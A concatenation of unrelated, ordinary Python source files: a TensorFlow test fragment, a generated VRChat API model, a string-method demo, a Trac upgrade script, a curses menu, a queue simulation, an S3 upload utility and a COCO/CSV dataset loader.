out = tf.compat.v1.image.resize_bilinear(
input_tensor,
size=parameters["size"],
align_corners=parameters["align_corners"],
half_pixel_centers=parameters["half_pixel_centers"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
parameters["dtype"],
parameters["input_shape"],
min_value=-1,
max_value=1)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
|
"""
VRChat API Documentation
The version of the OpenAPI document: 1.6.8
Contact: me@ruby.js.org
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from vrchatapi.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
from ..model_utils import OpenApiModel
from vrchatapi.exceptions import ApiAttributeError
class PlayerModerationID(ModelSimple):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
('value',): {
'regex': {
'pattern': r'', # noqa: E501
},
},
}
additional_properties_type = None
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
'value': (str,),
}
@cached_property
def discriminator():
return None
attribute_map = {}
read_only_vars = set()
_composed_schemas = None
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs):
"""PlayerModerationID - a model defined in OpenAPI
Note that value can be passed either in args or in kwargs, but not in both.
Args:
args[0] (str): # noqa: E501
Keyword Args:
value (str): # noqa: E501
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
# required up here when default value is not given
_path_to_item = kwargs.pop('_path_to_item', ())
if 'value' in kwargs:
value = kwargs.pop('value')
elif args:
args = list(args)
value = args.pop(0)
else:
raise ApiTypeError(
"value is required, but not passed in args or kwargs and doesn't have default",
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.value = value
if kwargs:
raise ApiTypeError(
"Invalid named arguments=%s passed to %s. Remove those invalid named arguments." % (
kwargs,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs):
"""PlayerModerationID - a model defined in OpenAPI
Note that value can be passed either in args or in kwargs, but not in both.
Args:
args[0] (str): # noqa: E501
Keyword Args:
value (str): # noqa: E501
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
# required up here when default value is not given
_path_to_item = kwargs.pop('_path_to_item', ())
self = super(OpenApiModel, cls).__new__(cls)
if 'value' in kwargs:
value = kwargs.pop('value')
elif args:
args = list(args)
value = args.pop(0)
else:
raise ApiTypeError(
"value is required, but not passed in args or kwargs and doesn't have default",
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.value = value
if kwargs:
raise ApiTypeError(
"Invalid named arguments=%s passed to %s. Remove those invalid named arguments." % (
kwargs,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
return self
|
x = "python"
print(x.startswith("P"))
print(x.startswith("p")) # Return True if x starts with the specified prefix, False otherwise
print(x.endswith("P")) # Return True if x ends with the specified suffix, False otherwise
print(x.endswith('n'))
print(x.islower()) # Return True if the string is a lowercase string, False otherwise
print(x.istitle()) # Return True if the string is a title-cased string, False otherwise
print(x.isspace()) # Return True if the string is a whitespace string, False otherwise
print(x.isalpha()) # Return True if the string is an alphabetic string, False otherwise
print(x.isnumeric()) # Return True if the string is a numeric string, False otherwise
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2014-2019 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.com/license.html.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/.
from trac.util import backup_config_file
def do_upgrade(env, version, cursor):
"""Move definition of default repository from [trac] repository_dir to
[repositories] section.
"""
backup_config_file(env, '.db31.bak')
repository_dir = env.config.get('trac', 'repository_dir')
if repository_dir:
if not env.config.get('repositories', '.dir') and \
not env.config.get('repositories', '.alias'):
env.config.set('repositories', '.dir', repository_dir)
env.log.info("Moved configuration options for default repository "
"to [repositories] section of trac.ini")
else:
env.log.info("[trac] repository_dir = %s discarded from "
"configuration because [repositories] "
"'.dir' or '.alias' already exists.", repository_dir)
env.config.remove('trac', 'repository_dir')
env.config.save()
|
import curses
if __name__ == "__main__":
print("Ejecutar el archivo main.py")
height, width = 1, 1
def set_size(stdscr):
global height, width
height, width = stdscr.getmaxyx()
def center_print(stdscr, text, y):
global height, width
t_len = len(text)
x = width // 2 - t_len // 2
stdscr.addstr(y, x, text)
stdscr.refresh()
def show_menu(stdscr, selected_row_idx, options):
h, w = stdscr.getmaxyx()
for idx, row in enumerate(options):
x = w//2 - len(row)//2
y = h//2 - len(options)//2 + idx
if row == "Salir" or row == "Volver al menú":
y += 1
if idx == selected_row_idx:
stdscr.attron(curses.color_pair(1))
stdscr.addstr(y, x, row)
stdscr.attroff(curses.color_pair(1))
else:
stdscr.addstr(y, x, row)
stdscr.refresh()
def arrow_moves(stdscr, current_row, options, decrement, increment):
key = stdscr.getch()
if key == decrement and current_row > 0:
current_row -= 1
elif key == increment and current_row < len(options)-1:
current_row += 1
elif key == curses.KEY_ENTER or key in [10, 13]:
return True, current_row
return False, current_row
def menu_displayer(stdscr, options, title, current_option):
h, w = height, width
stdscr.clear()
while True:
center_print(stdscr, title.upper(), h//2 - len(options))
show_menu(stdscr, current_option, options)
is_selected, current_option = arrow_moves(stdscr, current_option, options,
curses.KEY_UP, curses.KEY_DOWN)
show_menu(stdscr, current_option, options)
if is_selected:
return current_option
|
""" Functions for moving clusters experiment. """
import itertools as it
import sys
import ciw
import dask
import numpy as np
import pandas as pd
import tqdm
from ciw.dists import Exponential
from dask.diagnostics import ProgressBar
from util import (
COPD,
DATA_DIR,
MAX_TIME,
NUM_SERVERS,
PROPS,
ShiftedExponential,
get_queue_params,
get_results,
)
OUT_DIR = DATA_DIR / "moving_clusters/"
OUT_DIR.mkdir(exist_ok=True)
NUM_CORES = int(sys.argv[1])
NUM_SEEDS = int(sys.argv[2])
MOVE_GRANULARITY = float(sys.argv[3])
PROP_TO_MOVE_RANGE = np.arange(0, 1, MOVE_GRANULARITY).round(2)
n_clusters = COPD["cluster"].nunique()
def get_combinations():
return (
labels
for labels in it.product(range(n_clusters), repeat=2)
if labels[0] != labels[1]
)
def get_params():
return it.product(get_combinations(), PROP_TO_MOVE_RANGE, range(NUM_SEEDS))
def update_arrival_params(all_queue_params, origin, destination, prop_to_move):
origin_lambda = all_queue_params[origin]["arrival"]
destination_lambda = all_queue_params[destination]["arrival"]
destination_lambda += prop_to_move * origin_lambda
origin_lambda *= 1 - prop_to_move
all_queue_params[origin]["arrival"] = origin_lambda
all_queue_params[destination]["arrival"] = destination_lambda
return all_queue_params
@dask.delayed
def simulate_queue(
data, props, num_servers, origin, destination, prop_to_move, seed, max_time
):
""" Build and simulate a queue under the provided parameters. """
ciw.seed(seed)
all_queue_params = {}
for label, prop in zip(range(n_clusters), props):
cluster = data[data["cluster"] == label]
all_queue_params[label] = get_queue_params(cluster, prop)
all_queue_params = update_arrival_params(
all_queue_params, origin, destination, prop_to_move
)
N = ciw.create_network(
arrival_distributions={
f"Class {label}": [Exponential(params["arrival"])]
for label, params in all_queue_params.items()
},
service_distributions={
f"Class {label}": [ShiftedExponential(*params["service"])]
for label, params in all_queue_params.items()
},
number_of_servers=[num_servers],
)
Q = ciw.Simulation(N)
Q.simulate_until_max_time(max_time)
return Q
def main():
tasks = (
simulate_queue(
COPD,
PROPS,
NUM_SERVERS,
origin,
destination,
prop_to_move,
seed,
MAX_TIME,
)
for (origin, destination), prop_to_move, seed in get_params()
)
with ProgressBar():
queues = dask.compute(
*tasks, scheduler="processes", num_workers=NUM_CORES
)
util_dfs, time_dfs = [], []
for ((orgn, dest), move, seed), queue in tqdm.tqdm(
zip(get_params(), queues)
):
utilisations, system_times = get_results(
queue,
MAX_TIME,
origin=orgn,
destination=dest,
prop_to_move=move,
seed=seed,
)
util_dfs.append(utilisations)
time_dfs.append(system_times)
utilisations = pd.concat(util_dfs)
system_times = pd.concat(time_dfs)
utilisations.to_csv(OUT_DIR / "utilisations.csv", index=False)
system_times.to_csv(OUT_DIR / "system_times.csv", index=False)
if __name__ == "__main__":
main()
|
#!/usr/bin/env python3
# coding=utf-8
"""A utility to write a raw vendor/data files to AWS S3.
To use this utility you will need to ensure that your AWS credentials
are available via expected environment variables. Please refer to
the AWS boto3 documentation, which describes this: -
https://boto3.amazonaws.com/v1/documentation/api/latest/guide/quickstart.html
Alan Christie
February 2019
"""
import argparse
import logging
import os
import sys
import boto3
# Configure basic logging
formatter = logging.Formatter('%(asctime)s %(levelname)s # %(message)s',
'%Y-%m-%dT%H:%M:%S')
out_hdlr = logging.StreamHandler()
out_hdlr.setFormatter(formatter)
out_hdlr.setLevel(logging.INFO)
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
logger.addHandler(out_hdlr)
# Expected environment variables (that define the bucket)
s3_bucket_env = 'AWS_S3_BUCKET'
s3_raw_root = 'raw'
s3_archive_bucket = os.environ.get(s3_bucket_env)
if not s3_archive_bucket:
logger.error('You must define %s', s3_bucket_env)
sys.exit(1)
parser = argparse.ArgumentParser('Graph Raw File Putter')
parser.add_argument('source', metavar='DIR', type=str,
help='The local directory (where the raw data exists)')
parser.add_argument('prefix', metavar='PREFIX', type=str,
help='The file prefix'
' (only files with this prefix will be written)')
parser.add_argument('path', metavar='PATH', type=str,
help='The path, relative to the "raw" directory'
' in your S3 bucket. e.g. "activity/senp7"')
args = parser.parse_args()
# Check source directory
if not os.path.isdir(args.source):
logger.error('The source directory does not exist (%s)', args.source)
sys.exit(1)
# The S3 raw path...
dst = s3_raw_root + '/' + args.path + '/'
s3_client = boto3.client('s3')
# We must not write to an existing path (key).
# It is up to the user to make sure the destination does not exist,
# it's too easy to over-write files in S3.
target = s3_client.list_objects_v2(Bucket=s3_archive_bucket,
Prefix=dst)
if 'KeyCount' in target and target['KeyCount']:
logger.error('The raw path already exists in S3.'
' You cannot "put" to existing locations.')
sys.exit(1)
# Upload the list of files...
potential_files = os.listdir(args.source)
for potential_file in potential_files:
src = os.path.join(args.source, potential_file)
if os.path.isfile(src) and potential_file.startswith(args.prefix):
dst = s3_raw_root + '/' + args.path + '/' + potential_file
logger.info('Putting %s -> %s...', potential_file, args.path)
s3_client.upload_file(src, s3_archive_bucket, dst)
|
from __future__ import print_function, division
import sys
import os
import torch
import numpy as np
import random
import csv
from torch.utils.data import Dataset, DataLoader
from torchvision import transforms, utils
from torch.utils.data.sampler import Sampler
from pycocotools.coco import COCO
import skimage.io
import skimage.transform
import skimage.color
import skimage
from PIL import Image
class CocoDataset(Dataset):
"""Coco dataset."""
def __init__(self, root_dir, set_name='train2017', transform=None):
"""
Args:
root_dir (string): COCO directory.
transform (callable, optional): Optional transform to be applied
on a sample.
"""
self.root_dir = root_dir
self.set_name = set_name
self.transform = transform
self.coco = COCO(os.path.join(self.root_dir, 'annotations', 'instances_' + self.set_name + '.json'))
self.image_ids = self.coco.getImgIds()
self.load_classes()
def load_classes(self):
# load class names (name -> label)
categories = self.coco.loadCats(self.coco.getCatIds())
categories.sort(key=lambda x: x['id'])
self.classes = {}
self.coco_labels = {}
self.coco_labels_inverse = {}
for c in categories:
self.coco_labels[len(self.classes)] = c['id']
self.coco_labels_inverse[c['id']] = len(self.classes)
self.classes[c['name']] = len(self.classes)
# also load the reverse (label -> name)
self.labels = {}
for key, value in self.classes.items():
self.labels[value] = key
def __len__(self):
return len(self.image_ids)
def __getitem__(self, idx):
img = self.load_image(idx)
annot = self.load_annotations(idx)
sample = {'img': img, 'annot': annot}
if self.transform:
sample = self.transform(sample)
return sample
def load_image(self, image_index):
image_info = self.coco.loadImgs(self.image_ids[image_index])[0]
path = os.path.join(self.root_dir, self.set_name, image_info['file_name'])
img = skimage.io.imread(path)
if len(img.shape) == 2:
img = skimage.color.gray2rgb(img)
return img.astype(np.float32)/255.0
def load_annotations(self, image_index):
# get ground truth annotations
annotations_ids = self.coco.getAnnIds(imgIds=self.image_ids[image_index], iscrowd=False)
annotations = np.zeros((0, 5))
# some images appear to miss annotations (like image with id 257034)
if len(annotations_ids) == 0:
return annotations
# parse annotations
coco_annotations = self.coco.loadAnns(annotations_ids)
for idx, a in enumerate(coco_annotations):
# some annotations have basically no width / height, skip them
if a['bbox'][2] < 1 or a['bbox'][3] < 1:
continue
annotation = np.zeros((1, 5))
annotation[0, :4] = a['bbox']
annotation[0, 4] = self.coco_label_to_label(a['category_id'])
annotations = np.append(annotations, annotation, axis=0)
# transform from [x, y, w, h] to [x1, y1, x2, y2]
annotations[:, 2] = annotations[:, 0] + annotations[:, 2]
annotations[:, 3] = annotations[:, 1] + annotations[:, 3]
return annotations
def coco_label_to_label(self, coco_label):
return self.coco_labels_inverse[coco_label]
def label_to_coco_label(self, label):
return self.coco_labels[label]
def image_aspect_ratio(self, image_index):
image = self.coco.loadImgs(self.image_ids[image_index])[0]
return float(image['width']) / float(image['height'])
def num_classes(self):
return 80
class CSVDataset(Dataset):
"""CSV dataset."""
def __init__(self, train_file, class_list, transform=None):
"""
Args:
train_file (string): CSV file with training annotations
annotations (string): CSV file with class list
test_file (string, optional): CSV file with testing annotations
"""
self.train_file = train_file
self.class_list = class_list
self.transform = transform
# parse the provided class file
try:
with self._open_for_csv(self.class_list) as file:
self.classes = self.load_classes(csv.reader(file, delimiter=','))
except ValueError as e:
raise_from(ValueError('invalid CSV class file: {}: {}'.format(self.class_list, e)), None)
self.labels = {}
for key, value in self.classes.items():
self.labels[value] = key
# csv with img_path, x1, y1, x2, y2, class_name
try:
with self._open_for_csv(self.train_file) as file:
self.image_data = self._read_annotations(csv.reader(file, delimiter=','), self.classes)
except ValueError as e:
raise_from(ValueError('invalid CSV annotations file: {}: {}'.format(self.train_file, e)), None)
self.image_names = list(self.image_data.keys())
def _parse(self, value, function, fmt):
"""
Parse a string into a value, and format a nice ValueError if it fails.
Returns `function(value)`.
Any `ValueError` raised is catched and a new `ValueError` is raised
with message `fmt.format(e)`, where `e` is the caught `ValueError`.
"""
try:
return function(value)
except ValueError as e:
raise_from(ValueError(fmt.format(e)), None)
def _open_for_csv(self, path):
"""
Open a file with flags suitable for csv.reader.
This is different for python2 it means with mode 'rb',
for python3 this means 'r' with "universal newlines".
"""
if sys.version_info[0] < 3:
return open(path, 'rb')
else:
return open(path, 'r', newline='')
def load_classes(self, csv_reader):
result = {}
for line, row in enumerate(csv_reader):
line += 1
try:
class_name, class_id = row
except ValueError:
raise_from(ValueError('line {}: format should be \'class_name,class_id\''.format(line)), None)
class_id = self._parse(class_id, int, 'line {}: malformed class ID: {{}}'.format(line))
if class_name in result:
raise ValueError('line {}: duplicate class name: \'{}\''.format(line, class_name))
result[class_name] = class_id
return result
def __len__(self):
return len(self.image_names)
def __getitem__(self, idx):
img = self.load_image(idx)
annot = self.load_annotations(idx)
sample = {'img': img, 'annot': annot}
if self.transform:
sample = self.transform(sample)
return sample
def load_image(self, image_index):
img = skimage.io.imread(self.image_names[image_index])
if len(img.shape) == 2:
img = skimage.color.gray2rgb(img)
return img.astype(np.float32)/255.0
def load_annotations(self, image_index):
# get ground truth annotations
annotation_list = self.image_data[self.image_names[image_index]]
annotations = np.zeros((0, 5))
# some images appear to miss annotations (like image with id 257034)
if len(annotation_list) == 0:
return annotations
# parse annotations
for idx, a in enumerate(annotation_list):
# some annotations have basically no width / height, skip them
x1 = a['x1']
x2 = a['x2']
y1 = a['y1']
y2 = a['y2']
if (x2-x1) < 1 or (y2-y1) < 1:
continue
annotation = np.zeros((1, 5))
annotation[0, 0] = x1
annotation[0, 1] = y1
annotation[0, 2] = x2
annotation[0, 3] = y2
annotation[0, 4] = self.name_to_label(a['class'])
annotations = np.append(annotations, annotation, axis=0)
return annotations
def _read_annotations(self, csv_reader, classes):
result = {}
for line, row in enumerate(csv_reader):
line += 1
try:
img_file, x1, y1, x2, y2, class_name = row[:6]
except ValueError:
raise_from(ValueError('line {}: format should be \'img_file,x1,y1,x2,y2,class_name\' or \'img_file,,,,,\''.format(line)), None)
if img_file not in result:
result[img_file] = []
# If a row contains only an image path, it's an image without annotations.
if (x1, y1, x2, y2, class_name) == ('', '', '', '', ''):
continue
x1 = self._parse(x1, int, 'line {}: malformed x1: {{}}'.format(line))
y1 = self._parse(y1, int, 'line {}: malformed y1: {{}}'.format(line))
x2 = self._parse(x2, int, 'line {}: malformed x2: {{}}'.format(line))
y2 = self._parse(y2, int, 'line {}: malformed y2: {{}}'.format(line))
# Check that the bounding box is valid.
if x2 <= x1:
raise ValueError('line {}: x2 ({}) must be higher than x1 ({})'.format(line, x2, x1))
if y2 <= y1:
raise ValueError('line {}: y2 ({}) must be higher than y1 ({})'.format(line, y2, y1))
# check if the current class name is correctly present
if class_name not in classes:
raise ValueError('line {}: unknown class name: \'{}\' (classes: {})'.format(line, class_name, classes))
result[img_file].append({'x1': x1, 'x2': x2, 'y1': y1, 'y2': y2, 'class': class_name})
return result
def name_to_label(self, name):
return self.classes[name]
def label_to_name(self, label):
return self.labels[label]
def num_classes(self):
return max(self.classes.values()) + 1
def image_aspect_ratio(self, image_index):
image = Image.open(self.image_names[image_index])
return float(image.width) / float(image.height)
def collater(data):
imgs = [s['img'] for s in data]
annots = [s['annot'] for s in data]
scales = [s['scale'] for s in data]
widths = [int(s.shape[0]) for s in imgs]
heights = [int(s.shape[1]) for s in imgs]
batch_size = len(imgs)
max_width = np.array(widths).max()
max_height = np.array(heights).max()
padded_imgs = torch.zeros(batch_size, max_width, max_height, 3)
for i in range(batch_size):
img = imgs[i]
padded_imgs[i, :int(img.shape[0]), :int(img.shape[1]), :] = img
max_num_annots = max(annot.shape[0] for annot in annots)
if max_num_annots > 0:
annot_padded = torch.ones((len(annots), max_num_annots, 5)) * -1
if max_num_annots > 0:
for idx, annot in enumerate(annots):
#print(annot.shape)
if annot.shape[0] > 0:
annot_padded[idx, :annot.shape[0], :] = annot
else:
annot_padded = torch.ones((len(annots), 1, 5)) * -1
padded_imgs = padded_imgs.permute(0, 3, 1, 2)
return {'img': padded_imgs, 'annot': annot_padded, 'scale': scales}
class Resizer(object):
"""Convert ndarrays in sample to Tensors."""
def __call__(self, sample, min_side=608, max_side=1024):
image, annots = sample['img'], sample['annot']
rows, cols, cns = image.shape
smallest_side = min(rows, cols)
# rescale the image so the smallest side is min_side
scale = min_side / smallest_side
# check if the largest side is now greater than max_side, which can happen
# when images have a large aspect ratio
largest_side = max(rows, cols)
if largest_side * scale > max_side:
scale = max_side / largest_side
# resize the image with the computed scale
image = skimage.transform.resize(image, (int(round(rows*scale)), int(round((cols*scale)))))
rows, cols, cns = image.shape
pad_w = 32 - rows%32
pad_h = 32 - cols%32
new_image = np.zeros((rows + pad_w, cols + pad_h, cns)).astype(np.float32)
new_image[:rows, :cols, :] = image.astype(np.float32)
annots[:, :4] *= scale
return {'img': torch.from_numpy(new_image), 'annot': torch.from_numpy(annots), 'scale': scale}
class Augmenter(object):
"""Convert ndarrays in sample to Tensors."""
def __call__(self, sample, flip_x=0.5):
if np.random.rand() < flip_x:
image, annots = sample['img'], sample['annot']
image = image[:, ::-1, :]
rows, cols, channels = image.shape
x1 = annots[:, 0].copy()
x2 = annots[:, 2].copy()
x_tmp = x1.copy()
annots[:, 0] = cols - x2
annots[:, 2] = cols - x_tmp
sample = {'img': image, 'annot': annots}
return sample
class Normalizer(object):
def __init__(self):
self.mean = np.array([[[0.485, 0.456, 0.406]]])
self.std = np.array([[[0.229, 0.224, 0.225]]])
def __call__(self, sample):
image, annots = sample['img'], sample['annot']
return {'img':((image.astype(np.float32)-self.mean)/self.std), 'annot': annots}
class UnNormalizer(object):
def __init__(self, mean=None, std=None):
if mean == None:
self.mean = [0.485, 0.456, 0.406]
else:
self.mean = mean
if std == None:
self.std = [0.229, 0.224, 0.225]
else:
self.std = std
def __call__(self, tensor):
"""
Args:
tensor (Tensor): Tensor image of size (C, H, W) to be normalized.
Returns:
Tensor: Normalized image.
"""
for t, m, s in zip(tensor, self.mean, self.std):
t.mul_(s).add_(m)
return tensor
class AspectRatioBasedSampler(Sampler):
def __init__(self, data_source, batch_size, drop_last):
self.data_source = data_source
self.batch_size = batch_size
self.drop_last = drop_last
self.groups = self.group_images()
def __iter__(self):
random.shuffle(self.groups)
for group in self.groups:
yield group
def __len__(self):
if self.drop_last:
return len(self.data_source) // self.batch_size
else:
return (len(self.data_source) + self.batch_size - 1) // self.batch_size
def group_images(self):
# determine the order of the images
order = list(range(len(self.data_source)))
order.sort(key=lambda x: self.data_source.image_aspect_ratio(x))
# divide into groups, one group = one batch
return [[order[x % len(order)] for x in range(i, i + self.batch_size)] for i in range(0, len(order), self.batch_size)]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.